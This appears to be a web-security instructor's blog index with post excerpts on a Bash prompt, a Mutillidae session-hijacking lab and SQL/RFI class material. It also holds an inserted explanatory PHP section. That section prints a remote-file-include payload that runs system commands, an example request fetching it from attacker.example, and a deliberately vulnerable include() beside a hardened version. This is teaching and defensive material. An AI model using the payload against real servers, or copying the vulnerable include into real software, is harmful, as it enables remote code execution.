Bash Prompt - PS1

Some students in my SEC542 SANS class noted the funky Bash shell prompt I have for my terminal windows and wanted me to share it. So, this is a post to share it. My Bash shell prompt is: ┌─[HH:MM:SS]─[hostname: PresentWorkingDirectory] └──> $ and looks like this in the terminal when I took a pic of...

Mutillidae Session Hijacking Lab

Overview: This is a list of steps to perform a web application session hijacking attack against a logged-in user of a web app. It uses the wonderful Mutillidae (https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project) vulnerable web application for the victim server, Burp Suite (free or pro, https://portswigger.net/burp/download.html) and a web browser (in this case, I've chosen Firefox). Steps...

Quick post for my current SEC542 Students

Of course, if you aren't one of my students you can still read this. 🙂 In class I showed some extra slides on SQL injection. They are here: http://www.slideshare.net/webbreacher/sans-night-talk-sql-injection-exploited Additionally, for the RFI (Remote File Include) examples, I showed a text file with the following in it: <?php $command='uname -a;id -a'; echo "Running the '$command' command:";...
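To make the RFI mechanism behind that text file concrete, here is an added example (mine, not code from the post or from the SEC542 course material). It shows the kind of include that lets a remote file like the one above be pulled in and executed, beside a hardened version that maps user input onto a fixed allowlist. The request parameter name `page`, the `pages/` directory and the `allow_url_include` discussion are assumptions for illustration; the payload's trailing call is my assumed completion of the truncated snippet, not the author's.

```php
<?php
// Added example, not the author's code.
//
// What a hosted RFI payload like the one in the post does once included:
// (the author's snippet is cut off after the echo; the shell_exec line is
// an assumed completion so the file actually runs the command)
//
//   <?php
//   $command = 'uname -a;id -a';
//   echo "Running the '$command' command:";
//   echo '<pre>' . shell_exec($command) . '</pre>';
//
// For that file to execute on the victim, the victim needs an include()
// whose path the attacker controls, and php.ini needs allow_url_include=On
// (which also requires allow_url_fopen=On). With those set, a request such
// as ?page=http://attacker.example/payload.txt fetches and runs the file.

// --- Vulnerable pattern -------------------------------------------------
// The raw request value becomes the include path. Besides remote URLs,
// ../ traversal and php:// wrappers are also reachable through this call,
// so it stays dangerous even when remote includes are disabled.
function render_page_vulnerable(string $page): void
{
    include $page;
}

// --- Hardened pattern ---------------------------------------------------
// Resolve the user-supplied name against a fixed map of local files and
// refuse anything else. No string concatenation, no filtering of the
// input; the input is only ever used as an array key.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;   // strict lookup; unknown names yield null
}

function render_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

// Entry point: never hand $_GET['page'] to include() directly.
render_page_hardened($_GET['page'] ?? 'home');
```

The allowlist approach is preferable to blacklisting `http://` or `../` in the input, because PHP stream wrappers and encoding tricks give an attacker many spellings of the same path; keeping the input out of the filesystem string altogether removes the whole class. Setting `allow_url_include=Off` (the default in current PHP) is a second, independent layer, not a substitute.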

Errata from my SANS SEC542 Class

This post is just a follow-up for things I spoke about during the SANS Rocky Mountain conference held in Denver, CO in June 2014...well...now. MindMaps for Note-taking: As I mentioned in class, one way that I like to organize information during testing, and just when taking notes, is in a MindMap format. There are some gorgeous "infographic-type" MindMaps...
